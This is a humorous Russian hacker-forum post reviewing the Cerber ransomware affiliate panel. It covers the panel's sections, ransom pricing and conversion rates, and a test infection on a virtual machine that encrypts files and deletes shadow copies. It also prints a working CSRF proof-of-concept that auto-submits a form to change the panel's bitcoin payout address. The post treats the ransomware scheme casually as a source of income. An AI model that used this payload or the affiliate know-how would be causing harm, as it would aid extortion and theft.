Авторизация  
TEXHO

Криптолокер Cerber Ransomware [2016]

В теме 1 сообщение

2IGj6BQoS2GEQNSHHhRr0A.png

 

Пару дней назад, возвращаясь с очередного сбора иллюминатов (где было наконец-то решено, что есть детей от 1 года не западло), я случайно встретился со странным человеком в плаще. Он долго смотрел на меня из темноты. Черная шляпа не давала разглядеть его лицо, и я мог видеть только то, как свет от фонаря отражается в паре зрачков. Я чувствовал, как он сверлит меня взглядом. Когда я уже начал всерьез опасаться за сухость своих штанов, он передал мне пакет, перевязанный бечевкой, и растворился в темноте...

 

 

Мне не впервой встречаться с разными злодеями. ООО "Кробер и гомункулы" никогда не пасует перед опасностью. Я быстро добежал до дома, поменял штаны и изучил содержимое пакета. Там был только логин/пасс, линк на криптолокерную партнерку и пакетик спайса больше ничего.

 

Потными ладошками я набрал адрес в тор-бравзере...

 

Внутри.

 

Вход в панель. Легко преодолеваем этот несложный этап.

 

1di9zUqKSf2hSX5skUpYRA.png

 

Структура панельки такая:

 

 

1. Dashboard

2. Profile

3. Statistics

  • Installs
  • Profit
  • Referrals
  • Xml

4. Payments

5. Files

6. Support

7. FAQ

 

1) Dashboard:

 

KOMpyRSoR3OqY41f2zVuOw.png

 

2) Profile:

 

6TFxXqCVQGyweWluvxZq4g.png

 

3) Statistics > Installs:

 

aMQZ6atmSR6SNcSwsmoD2g.png

 

4) Statistics > Profit:

 

aCEhg0AlSVqPcr_-ZZI4sQ.png

 

5) Statistics > Referrals (рефералы, пассивный доход, все дела):

 

sqbI-MmsQ_WaFfMsMP6gRA.png

 

6) Statistics > XML:

 

NIc9limUT7iriq3etk2rLQ.png

 

7) Payments:

 

t67GqVqvRM29rmKzOfdqCA.png

 

8) Files (Можно наделать кучу SubID, для работы по разным целям):

 

ppJWke4BShujq7CUofQsww.png

 

9) Files > Price Settings (можно очень тонко настроить сумму выкупа, в зависимости от того, сколько файлов было закриптовано):

 

QA4VxofjR5abFeDHZ7-vmA.png

 

10) Support (мне на тикет ответили в течении дня):

 

UMSkgNARRR_HqFZI8PCagg.png

 

11) FAQ (к слову, вопросов-ответов не так уж и много):

 

bapVWmEkRJeJdbE12H_wOQ.png

 

Панель на bootstrap, все удобно, красивенько. Расширенная статистика, рефералы, лендинг с детальнейшим мануалом по оплате выкупа на нескольких языках, выгрузка отчетов по xml, да и за целый месяц работы алгоритм криптолокера так и не был взломан - все это говорит о серьезном подходе. Как говорят овнеры, средний конверт примерно от 0.5% до 3%, что вполне соответствует действительности.

 

Запуск.

 

Человек в черной шляпе вновь связался со мной и предложил мини-квест - узнать, куда отстукивает криптолокер. Хотя мой опыт в подобных делах и ограничивался только ловлей пинчей да уфров, но чем черт не шутит (как оказалось в дальнейшем - ничем). Для проверки, я добавил на виртуалку несколько файлов добытых с компа одного кул-хацкера.

 

На скриншоте содержимое одного файленга, особенно важного:

 

g0BqyyzMRIeIAXA2lt8k5A.png

 

Запускаем cerber.exe, ждем некоторое время и...

 

jki2GVr9T_exaR6Drc6bKg.png

 

А это то, что осталось от того самого файла (SuperSecretPasswords.txt):

 

pd_hw5fzRAqzrkHtT0QC5Q.png

 

Я посидел немного в WireShark и увидел только кучу одинаковых UDP запросов на IP-адреса из одной подсети. С достоверностью можно сказать только то, что инфа об установке уходит на один (или несколько) из тысяч IP-адресов. Это как искать иголку в стоге сена. Получается, надо мной просто издевались, когда предложили узнать куда отстукивает локер.

 

Можно конечно списать все на мою неопытность, но настоящие ресерчеры пришли к таким же выводам (http://blog.malwarebytes.org/intelli...ew-but-mature/) - практически нереально понять куда отправляет инфу локер.

 

Файлы шифруются очень быстро, и вдобавок все теневые копии (на Win 7, 8, 8.1 без предупреждения UAC) удаляются (естественно, что сей факт благоприятно влияет на конверт):

 

 

Одним словом - сатанинское творение, не иначе.

 

Ковыряния.

 

Поменяв еще одну пару штанишек, я решил поподставлять кавычки и скобочки. Правда, сначала пришлось поколдовать с бурп-сьютом.

 

Проковыряв примерно 2 дня, к сожалению, я ничего толком не нашел. Файл robots.txt, нескольких артефактов вроде log.txt и 3 простеньких CSRF. Одна позволяла сменить jabber, вторая - удалить биткоин кошелек для выплат, третья - сменить кошелек для выплат (сталобыть самая профитная):

 

Code:
<html><h1>YOUR BITCOINZ ARE BELONG TO US</h1><iframe style="display:none" name="csrf-frame"></iframe><form method='POST' action='http://cerber****.onion/crb/profile' target="csrf-frame" id="csrf-form"><input type='hidden' name='payment[bitcoin_address]' value='1111RedBear111RedBear111111RedBear'><input type='submit' value='submit' style="display:none"></form><script>document.getElementById("csrf-form").submit()</script></html>
Мало того, что это CSRF, так еще и жертва должна перейти по ссылке через тор-браузер. В общем, это было бы довольно сложно эксплуатировать (а сейчас уже все пофиксили).

 

Конечно, тот факт, что я практически ничего не нашел, не исключает того, что какие-то уязвимости есть. Следует учитывать, что мой профессиональный и интеллектуальный уровень оставляет желать лучшего - например, однажды я решил покормить батон белого хлеба вискасом.

 

Fin.

 

© r00t

Поделиться сообщением


Ссылка на сообщение

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация